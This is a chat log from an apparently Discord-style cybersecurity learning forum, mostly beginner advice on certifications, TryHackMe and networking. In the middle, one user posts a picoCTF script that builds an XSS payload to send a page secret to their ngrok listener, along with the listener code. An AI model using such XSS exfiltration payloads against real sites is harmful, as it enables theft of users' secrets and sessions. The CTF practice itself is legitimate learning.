it is a forum, it is not meant to be "looked at", it is meant to be used, if you have a question

I do it when I’m home

There is a file or something to reset or see inside the file the neo4j database creds?

and no, I don't use nethunter. Only a small community does.. that is why I point to those specialized community platforms

https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b

tutorial

Oh ok

Even inside those communities people wait sometimes for days for a reply 😉

but the developers are there, and a small group of engaged volunteers

I am new to cybersecurity and hacking what should I do can I go for security+ certificate like I am complete beginner

#👥・new-member-guide

https://tryhackme.com/hacktivities

What

https://github.com/ajfuto/comptia-security-plus

https://github.com/aaronshaf/security-plus

https://github.com/PacktPublishing/CompTIA-Security-SY0-501-Complete-Course-and-Practice-Exam/blob/master/CompTIA Security%2B (Study Notes).pdf

https://github.com/PacktPublishing/CompTIA-Security-SY0-701-Full-Training-Guide
https://github.com/MaheshShukla1/CompTIA-Security-Plus-SY0-701-Notes-CheatSheet-Exam-Prep

"new to cybersecurity"

i linked you the channel to the #👥・new-member-guide , it is a guide for new people
also linked tryhackme's roadmap

also check out all of these resources for exam prep, study guides, cheatsheets, and other resources

Appreciate it bro

@wet gate how do i connect to the machine at tryhackme

i dont know how to start

https://www.youtube.com/watch?v=TO_5gObqXeA

thanks

Hi guys i'm new to hacking and i wanna know the password for an ig account that i lost a while ago

Lets cut this short, alright?

Alr

Contact instagram support. If they cannot help you, no one here will

Ok

Ty

I'ma try too

Hi everyone i have a ctf i have been doing, which requires some skills in exploit development, can anyone help.

if you have specific problems, best to ask a specific question.

I am struggling to connect the vulnerable server to my webhook url created using ngrok, i can't get the request that carries the payload to go through\

elaborate on any error you get/what you already tried/what you previously tried/what CTF it is/etc etc etc

nobody can help you without specific information

it is a pico ctf challenge called "paper-2", lemme drop the python file, i think will explain my idea more

  import urllib.parse

  # 1. Setup
  CHALLENGE_URL = "https://lonely-island.picoctf.net:58734"
  # Your public ngrok address
  MY_LISTENER = "https://ellamae-subflexuose-emmitt.ngrok-free.dev"

  # 2. Build the JavaScript Payload
  # We use an Image object because it often bypasses simple Content Security     Policies (CSP)
  js_code = f"new Image().src='{MY_LISTENER}/?      stolen='+document.body.getAttribute('secret')"
  xss_payload = f"<script>{js_code}</script>"

  # 3. URL Encode the payload
  # This turns '<' into '%3C', etc., so the server accepts it as a parameter
  encoded_payload = urllib.parse.quote(xss_payload)

  # 4. Construct the Full Exploit URL
  exploit_url = f"{CHALLENGE_URL}/secret?payload={encoded_payload}"

  log.info(f"Generated Exploit URL: {exploit_url}")

  
  print(f"\n[!] SUBMIT THIS TO THE ADMIN BOT:\n{exploit_url}")

  def fast_claim(stolen_secret):
    r = remote('lonely-island.picoctf.net', 57059, ssl=True)
    
    http_request = (
        f"GET /flag?secret={stolen_secret} HTTP/1.1\r\n"
        f"Host: lonely-island.picoctf.net\r\n"
        "Connection: close\r\n\r\n"
    )
    
    r.send(http_request.encode())
    response = r.recvall().decode()
    
    if "picoCTF" in response:
        log.success(f"FLAG FOUND: {response.splitlines()[-1]}") ```

is it required in the CTF to connect back to your ngrok tunnel?

no, it is just my way of getting the flag, by exposing a listener for the reponse

import urllib.parse

class Listener(BaseHTTPRequestHandler):
    def do_GET(self):
        print(f"\n[!] RECEIVED REEQUEST: {self.path}")
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        if 'stolen' in query:
            print(f"FOUND SECRET: {query['stolen'][0]}")

        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"caught it!")

print("[+] Server is listening on localhost: ")
HTTPServer(('127.0.0.1', 80), Listener).serve_forever()```

Likewise

I was assuming the logs on my ngrok server requests and responses would be logged and appear on my localhost, so that i can get to the flag or just a response from the vulnerable server

Pls am new here. I have passion for computer and hacking stuffs . where can I start from

https://www.youtube.com/watch?v=J9T90s9tT1U

@slow edge ban this guy

#👥・new-member-guide

Thanks

thanks, i had come across the video but assumed it

Yo

So i am trying to learn actual ethical hacking but idk where to start and i keep losing motivation

Guys is ccna made to learn networking or is it another thing?

Start here #👥・new-member-guide

CCNA is certification of Cisco

And it is related to network, yes

You can learn a lot of good stuffs from that

Or you can learn from comptia network+ resources

But networking I mean I watched one ccna videos when I started learning networking about router switches lan and server client it was good just wanna know if it will help me learn networking cuz I think it's the best way to learn networking long courses

Ok, thanks

It will help you, yes

Don't learn it with only youtube videos

Read books

I'm trying out in tryhackme

I'm also interested in learning networking. I'm starting from almost nothing, but I want a solid grounding in networking. Which books do you recommend?

Practice

Nah

Already watched almost every basic networking videos

Tryhackme is not good resource I think

It is good for entry-level but not that much

I can't as I haven't read any

Oh, lol. Fair enough.

Yes, it will help you learn networking. Take notes, watch videos, practice active recall instead of just writing down what you read/hear.

I had good teacher for it

But i have to read anyway

So I will recall you when I find one

I want to start learning with teacher but they are learning everything so slowly

Probably i will choose network+ books

Because it is networking

You have to understand it

Yeah but I mean like they be learning what is lan for a week

Not just read or take notes

I really enjoyed Network+. It definitely helps with getting your foot in the door. I almost started to enjoy networking lol

Well so are students

Networking can be hard but also ease, depends on what you are learning. ALWAYS TAKE NOTES or you will forget allot

My teacher thought networking in 2 months, yeah it is not enough but I have good foundation

Take notes and read them

Don't enjoy it

Never

Is it easy? I mean I asked ai to ask me questions like network+ I got almost all of them right but I mean it's ai it was wrong I think cuz they were so easy

You don't have to learn networking deeply

I will always enjoy something else a tiny bit more than I will ever enjoy networking 😂

Reasonable

What do you want to be

The labs were hit or miss for difficulty. The questions were pretty alright and not as bad. As long as you study to learn and not just to memorize answers for practice quizzes you will be fine.

Network engineer?

Totally normal 😉

Or red teamer

Or blue

.

So you don't have to learn network deeply for starting

Basic understanding of OSI, TCP, IP, Protocols, IP headers is enough

I think I need more than that 😂

Then you will understand other things slowly

I am almost Jr web ptester and you don't

I don't have job so I have to write "almost" 😓

Actually you can finish cyber 101 path from thm

It will teach u some basics

Oh I guess in OSI you mean arp nat and things like that too right?

What about dns

I can't give u exact good path cuz I have finished good (the best in my country) 6 months course so I didn't follow my own path

OSI layers

The OSI model

Layer 1 to layer 7

Yeah but you can learn OSI in only like 8-9 hours

You can read

You can watch

But you can't understand

Bro how could I not understand I understand it really well

Please Do Not Throw Sausage Pizza Away 🗿 🔥

When you can not explain it to non tech people

The best advice lowkey

And this is really true

You can start from layers one by one and explain it simply to them so they will learn better at home

I didn't mean it

It is not to teach them

It is for urself

Just take one friend and try to explain network things

I did

Prepare papers

I already explained OSI model

With a lot of networking terms

Then start to explain them but not to urself

Hi

Hi

@limpid musk If you are able to explain the OSI model to someone else in a way that someone that doesn’t care about you or your interests can understand, you’ve got it. You’ll know once you start explaining things in terms of city blocks, nascar, countertop space, and so on lol

I really wasn't any good in anything didn't cared about anything it's the only thing I know that people not good with computers don't it actually makes me happy to explain things like that

How's it going

Don't care just explain

If you want to learn you have to try every possible way

What?

I mean you don't have to care their reacts

Bro you can make person to understand OSI model really easly I mean it's one of the basic of networking

I'm talking about my friend not some random dude

It is not about only OSI dude

There are a lot of terms

Firewall, dns, dhcp, IP, icmp, ft, smtp...

Find friend to listen it or just use ai for it

Say act as a non tech person and your opinions and start to explain

I know everything from there

Only icmp doesn't comes in mi d

Mind

So what do you want

To be an IP payload?

I don't know that 😂

I just wanna know when am I supposed to go for network+

I thought like you at the beginning of everything

But then I realized that I don't have to know all simple details

Just important things are enough

Alright so learn for like a month more than go for network+?

To get cert or only learning?

Do u want to take cert?

I'm learning for red team but i think cert also would help me out

It depends on ur country ecosystem

But i wouldn't take it

I have pentest+

Well I didn't pay for it

It is not important to get network+ for red teamer

How long have you been learning

Htb certs are good, offsec certs but it is too early for u

Like professional 1 year

For entertainment 4 or 5

But it was for entertainment

I didn't know even what am I doing

Or what is kali

Alr so your good when am I supposed to move on tools basic ones like nmap Wireshark and things like that

I think

I havent really touched anything other than networking yet

Linux commands only

After learning linux basics, windows basics, AD basics and intro to cybersec

You have to know about some terms in cybersec

So you should learn boring things before to go on with tools

And you don't have to know everything about AD as well